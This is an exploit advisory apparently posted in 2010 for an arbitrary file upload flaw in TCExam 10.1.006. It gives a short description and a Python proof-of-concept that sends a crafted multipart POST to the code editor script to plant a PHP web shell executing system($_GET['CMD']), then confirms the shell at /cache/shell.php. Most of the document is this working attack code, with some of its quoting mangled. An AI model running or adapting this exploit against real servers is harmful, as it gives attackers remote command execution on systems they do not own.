tcexam-shell.txt
Posted on 02 June 2010
#============================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/ /\_ /\_ /\_ /\_ /\_______) ) ___ ( /_/\__/ ) ___ ( /_/ /\_ /\_____/_/\__/ # # ) ) )( ( ( /_/( ( ( ( ( ( (___ __// /\_/ ) ) ) ) )/ /\_/ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\ \_ /\_\ \_ \_ / / / / /_/ (_ /_/ /_/ // /_/ (_ /_/ //\ \_\ \__ /_/ /_/_/ # # / / // / // / /__ / / /__ ( ( ( )_/ / / \_/ )_/ / / / / // /__/_ # # )_) / (_(( (_(( (_____(( (_____( /_/ / )_) ) /_/ / )_) / (_(( (_____)_) ) # # \_/ /_/ /_/ /_____/ /_____/ /_/_/ )_____( \_/ )_____( \_/ /_/ /_____/\_/ \_/ # # # #============================================================================================================# # # # Vulnerability............Arbitrary Upload # # Software.................TCExam 10.1.006 # # Download.................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=tcexam # # Date.....................6/1/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited # # to upload a PHP shell. # # # # # # ##Proof of Concept## # # # import sys, socket host = 'localhost' tc_exam = 'http://' + host + '/TCExam' port = 80 def upload_shell(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) content = '------x '\n'Content-Disposition: form-data; name="sendfile0" '\n' '\n'shell.php '\n'------x '\n'Content-Disposition: form-data; name="userfile0"; filename="shell.php" '\n'Content-Type: application/octet-stream '\n' '\n'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?> '\n'------x-- '\n' ' header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1 '\n'Host: ' + host + ' '\n'Proxy-Connection: keep-alive '\n'User-Agent: x '\n'Content-Length: ' + str(len(content)) + ' '\n'Cache-Control: max-age=0 '\n'Origin: null '\n'Content-Type: multipart/form-data; boundary=----x '\n'Accept: text/html '\n'Accept-Encoding: gzip,deflate,sdch '\n'Accept-Language: en-US,en;q=0.8 '\n'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 '\n'Cookie: LastVisit=1275442604 '\n' ' s.send(header + content) http_ok = 'HTTP/1.1 200 OK' if http_ok not in s.recv(8192): print 'error uploading shell' return else: print 'shell uploaded' s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1 '\n'Host: ' + host + ' ') if http_ok not in s.recv(8192): print 'shell not found' else: print 'shell located at ' + tc_exam + '/cache/shell.php' upload_shell()
